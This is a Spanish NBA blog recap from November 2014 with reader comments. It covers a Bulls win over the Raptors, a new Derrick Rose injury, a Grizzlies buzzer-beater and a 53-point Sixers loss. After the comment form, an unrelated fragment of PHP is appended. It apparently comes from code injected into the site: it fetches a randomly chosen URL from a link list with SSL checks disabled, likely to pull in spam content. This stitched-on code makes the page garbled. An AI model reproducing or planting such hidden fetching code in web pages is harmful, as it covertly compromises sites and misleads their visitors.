La Crónica: Un bucle de infinita desgracia

14 de November de 2014 por Sancho88

Se decidía anoche el primer puesto de la Conferencia Este en el Air Canada Centre entre los renovados Bulls y los azarosos Toronto Raptors. La victoria cayó del lado visitante en una noche en la que volvió a brillar el mayor de los Gasol, Jimmy Butler y el protagonista de nuestra crónica: Derrick Rose. La desgracia persigue a este chico, o simplemente todo está en su cabeza. Si hablásemos de la psicología conductista es probable que él esté atrayendo hacia sí mismo un halo de pesimismo en cuanto a su físico y las lesiones que le provoca, precisamente, todo tipo de percances. No sabemos cómo estará en su vida privada, pero todo le está influyendo en la cancha, y es que muchas veces una plaga de maldiciones bíblicas como es su caso no puede ser del todo casualidad, fortuito, mala suerte. Lleva dos años lesionándose asíduamente, como quien va a comprar el pan. De repente te levantas una mañana y ves la cara de Derrick Rose en todos los portales digitales con el gesto torcido, de mala suerte, de resignación, de tristeza. Derrick Rose está triste, pero no sabemos el motivo.

rose_raptors

Chicago Bulls 100 – Toronto Raptors 93

Anoche Derrick Rose volvió a recaer. No se asusten, esta vez no fue la rodilla, no parece tan grave; todo sucedió a escasos dos minutos para el final. Rose penetra ante Kyle Lowry con 93-83 en el marcador. 20 puntos en su haber y la confianza de que el partido ya está resuelto. Pero Rose nunca descansa, siempre va un paso más allá, siempre busca una entrada más hacia canasta para machacar a su rival. Kyle Lowry le deja su perfil izquierdo y Rose penetra. Parece que se resbala, se le va el tobillo y con él desplaza el muslo y todo su cuerpo cae sobre el parqué. James Johnson se lleva la bola, se la pasa a Terrence Ross que enchufa un triple. Thibodeau pide tiempo muerto, la cosa no pinta bien. Hace dos años, y hace un año, y es probable que esta misma mañana ocurra de nuevo, Thibs fue objeto de ira y de furia en este blog por no reservar más a Rose. Decíamos que tenía que jugar más CJ Watson, que si el partido estaba resuelto por qué estaba Rose en la cancha, que se dedicaba a explotar a su quinteto sin dar oportunidades al banquillo. Pero cuando tras dos años las lesiones se siguen cebando con este chaval, nos vamos dando cuenta de que no todo va a ser culpa de su entrenador. Esperemos que esta vez se quede todo en un susto. Rose, vuelve pronto.

El 100-93 del marcador nos dejó el mejor partido de la temporada hasta el momento de Pau Gasol: 27 puntos (12/19 en tiros de campo), 11 rebotes, 2 asistencias y 3 tapones. Jimmy Butler en otra actuación portentosa de las suyas se fue a 21 puntos, 9 rebotes y 6 asistencias en sus maratonianos y rutinarios 40 minutos de juego. Ellos dos, Joakim Noah y Mike Dunleavy están arropando al líder Rose. Pero el líder tiene que creer más en sus compañeros y no les puede dejar solos por nada en el mundo. Ayer fue el muslo, un tirón. Esperemos que no haya rotura muscular y se quede todo en un susto. Pero la ciudad del viento necesita a su MVP para rememorar hazañas de otra época que parece ya tan lejana. En los Raptors Kyle Lowry rozó el triple-doble (20-8-8) y James Johnson anotó 16 puntos desde el banquillo. Muy flojo Valanciunas, que se ahogó ante la defensa de Noah y Pau, y DeMar DeRozan firmó un ridículo 3/17 en tiros de campo. Cuidado Kobe, que este viene fuerte. No obstante, paradojas de la vida, con esa inefable actuación se convirtió en el tercer máximo anotador de la historia de los Raptors al superar a Andrea Bargnani. Solo le quedan por delante Vince Carter y Chris Bosh en una franquicia relativamente joven. Los Bulls empatan a victorias con los Raptors (7-2) pero les arrebatan el primer puesto del Este por enfrentamientos directos.

Sacramento Kings 110 – Memphis Grizzlies 111

Hablando de líderes, los Grizzlies afianzaron su primer puesto en el Oeste (8-1) gracias a un ‘buzzer beater’ de Courtney Lee a falta de dos décimas para el final del partido. Al igual que les sucedió la pasada noche a los Mavericks, los Kings empezaron enchufadísimos y al comienzo del segundo cuarto ganaban por 26 puntos (42-16). Pero Memphis no se iba a rendir tan fácilmente, y en los tres siguientes cuartos arreglaron el desastre del primero. No bajaron de 30 puntos por cuarto y fueron generosos en las asistencias (24 por 12 de los Kings). La solidaridad es básica en el baloncesto. Algún día aprenderán los Kings que muchos partidos se deciden así porque los rivales son más generosos y siempre buscan un pase extra. Anoche fue Lee quien se desquitó, como si reviviera aquella final de 2009 en la que falló una bandeja incomprensible ante Pau Gasol; aunque en la canasta de los Kings estaba él solo ayer, nadie se había acordado de defenderle.

A falta de 11 minutos para el final del partido los Kings dominaban por 18 puntos, y es ahí cuando apareció la defensa de los Grizzlies, que hasta el momento no había dado señales de vida. Entre Conley, Carter, Lee, Randolph y Marc resolvieron una papeleta complicada. La defensa de Prince y Tony Allen no había dado resultados y hubo que jugar al juego de los Kings, a la ofensiva. Esta vez le salió bien la jugada a David Joerger, todo un estratega según dicen. Conley fue el mejor del partido con 22 puntos y 11 asistencias, confirmando su resurgir personal tras unas primeras jornadas para olvidar. Y en la zona Randolph y Marc se combinaron entre los dos para anotar 37 puntos y 15 rebotes. En los Kings de nada valió el el doble-doble de Cousins (22-12), ni los 25 puntos de Gay, ni los 20 de Collison, ni los 17 de McLemore. El partido dura hasta que suena la bocina, y de nada vale firmar esos números si al final acabas dejando solo al lado de la canasta a un jugador rival que te gana el partido con una bandeja a falta de dos décimas. Los Kings vuelven a ser el espejismo que parecían. Se están diluyendo como un azucarillo tras un comienzo de temporada muy ilusionante.

Brooklyn Nets 99 – Golden State Warriors 107

En el Oracle Arena los Warriors se apoyaron en una gran defensa y en su típico ataque fluído para deshacerse de los Nets. Andrew Bogut fue el mástil atrás con 11 puntos, 14 rebotes y 4 tapones, y en la ofensiva le acompañaron los grumetes Thompson con 25 puntos y Curry y Draymond Green con 17 puntos por barba. En los Nets de nada valió el partido casi perfecto de Jarrett Jack desde el banquillo (23 puntos, 10/10 en tiros de campo).

Philadelphia 76ers 70 – Dallas Mavericks 123

Y llegamos al espectáculo de la mujer barbuda, a la catástrofe baloncestística de unos Sixers que no darían la talla ni siquiera en la liga LEB. Volvió Michael Carter-Williams tras muchos meses de lesión, pero su ‘equipo’, por llamarlo de alguna forma, no existe. Perder por 53 puntos es vergonzoso. Hinkie está destrozando la liga con su ‘tanking’ y los Mavs se pegaron el homenaje padre, pues jamás habían ganado a nadie por 53 puntos en toda su historia. Hasta que se han cruzado con esta banda, claro está. Jugó hasta Charlie Villanueva, jugaron todos. Los Sixers anotaron 27 puntos todo el quinteto. 21 anotó Dirk Nowitzki. Poco más que comentar. Los Sixers no tienen nivel suficiente para jugar en la NBA con estos jugadores actualmente. La NBA debería tomar cartas en el asunto inmediatamente porque es de chiste. Vamos con los premios.

PREMIOS

MVP: Pau & Jimmy, Jimmy & Pau. En total, 48 puntos, 19 de 29 en tiros de campo, 20 rebotes, 8 asistencias, 4 tapones y victoria para reivindicar a los Bulls como favoritos del Este.

Rookie: 9 puntos, 3 rebotes, 2 asistencias y premio como mejor debutante del día para Bojan Bogdanovic.

Sorpresa: Sensacional rendimiento de James Johnson ante los Bulls con 16 puntos, 5 rebotes, 4 robos y 4 tapones. También el de Jarrett Jack, infalible en sus 10 tiros de campo y autor de 23 puntos en 26 minutos. Sorprenden menos las prestaciones que está ofreciendo Courtney Lee, anoche suplente pero decisivo en el triunfo de los Grizzlies. Las 11 asistencias de Barea en 20 minutos, si no fuese contra Philadelphia, habrían sido una gran sorpresa.

Decepción: Pocas posibilidades tienen los Raptors si DeRozan no da el nivel, tal y como fue el caso anoche. 3 de 17 en tiros, 1 rebote y 2 asistencias fue todo lo que aportó. ¿Lo de los Sixers decepciona a alguien a estas alturas?

Mayor esfuerzo en vano: El 20-8-8 de Lowry se quedó corto frente a los Bulls, pero el premio es para los Kings, que tuvieron una victoria de prestigio en la mano y la dejaron escapar como sólo ellos saben pese a las excelentes actuaciones de Cousins, Gay y Collison, los tres por encima de la veintena de puntos.

Top 10

Comenta

5 comentarios a esta entrada

  1. Azabel dice:
    #1

    que decir de los sixers, nunca ha existido un equipo tan tan malo, con MCW la cosa mejora muchisimo, al menos este chaval tiene nivel NBA, pero sin el, quisiera ver que equipo le ganan

    13 victorias es el peor record de la historia no?

      Citar

  2. Denise dice:
    #2

    Azabel:
    que decir de los sixers, nunca ha existido un equipo tan tan malo, con MCW la cosa mejora muchisimo, al menos este chaval tiene nivel NBA, pero sin el, quisiera ver que equipo le ganan

    13 victorias es el peor record de la historia no?

    Me suena hablando de memoria que son 9 de los Cavs el año antes de Lebron, y tambien 9 de algun equipo durante algun lock.out en el que se juegan menos partidos en la temporada.
    La unica opcion de que los 76ers ganen partidos son cuando reciban a equipos que vengan de back-to-backs. Ojala Adam Silver mande trucar la Lottery del Draft y les tocase el pick 10.

      Citar

  3. rumbero dice:
    #3

    Con calendario de 82 partidos, los peores son los Sixers de la 72-73 que sólo ganaron 9 (ahora nose si me lo invento pero creo que había un artículo en el blog sobre ellos) Con lockouts de por medio hay cosas peores aún. Sin ir más lejos, en el último que hubo los Bobcats ganaron 7 partidos de 60 y pico.

    La canasta de Lee muy bonita, pero vaya tela como defiende Sacramento la última jugada. Con 2 bloqueos se queda un tio SOLO debajo el aro. Habían empezado muy bien los Kings pero entre esta derrota y la que tuvieron frente a Mavs donde también iban ganando de +20 se ve que les falta un punto. A ver si aprenden de ello

      Citar

  4. sabas dice:
    #4

    Curioso, van a ser los propios Sixers quienes van a batir su propio recors esta temporada

      Citar

  5. Ruxixon dice:
    #5

    Gran lección de los Bulls para sobreponerse a un partido que se le había puesto complicadete en el segundo cuarto en esa pista tan caliente del Air Canada Centre.Aún con ese desastre que fue la segunda unidad en dicho cuarto,acumulando muchísimas pérdidas y con poco acierto,personificado en el rookie McDermott (Master Thibs este primer año,sobre todo mientras Dunleavy siga así de bien) consiguieron que los Raptors no se fueran en el marcador.Luego ya con los titulares + Gibson firmaron lo que viene a ser una gran demostración frente al hasta ese momento mejor equipo del este.Esperemos que lo de Rose quede en el peor de los casos en unos días de reposo ya que se habla de un tirón.

    A nivel individual que bueno es Jimmy Butler,redios.Ya sólo le faltaba ser más fiable en ataque.Vaya preparando la billetera Mr.Reinsdorf

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>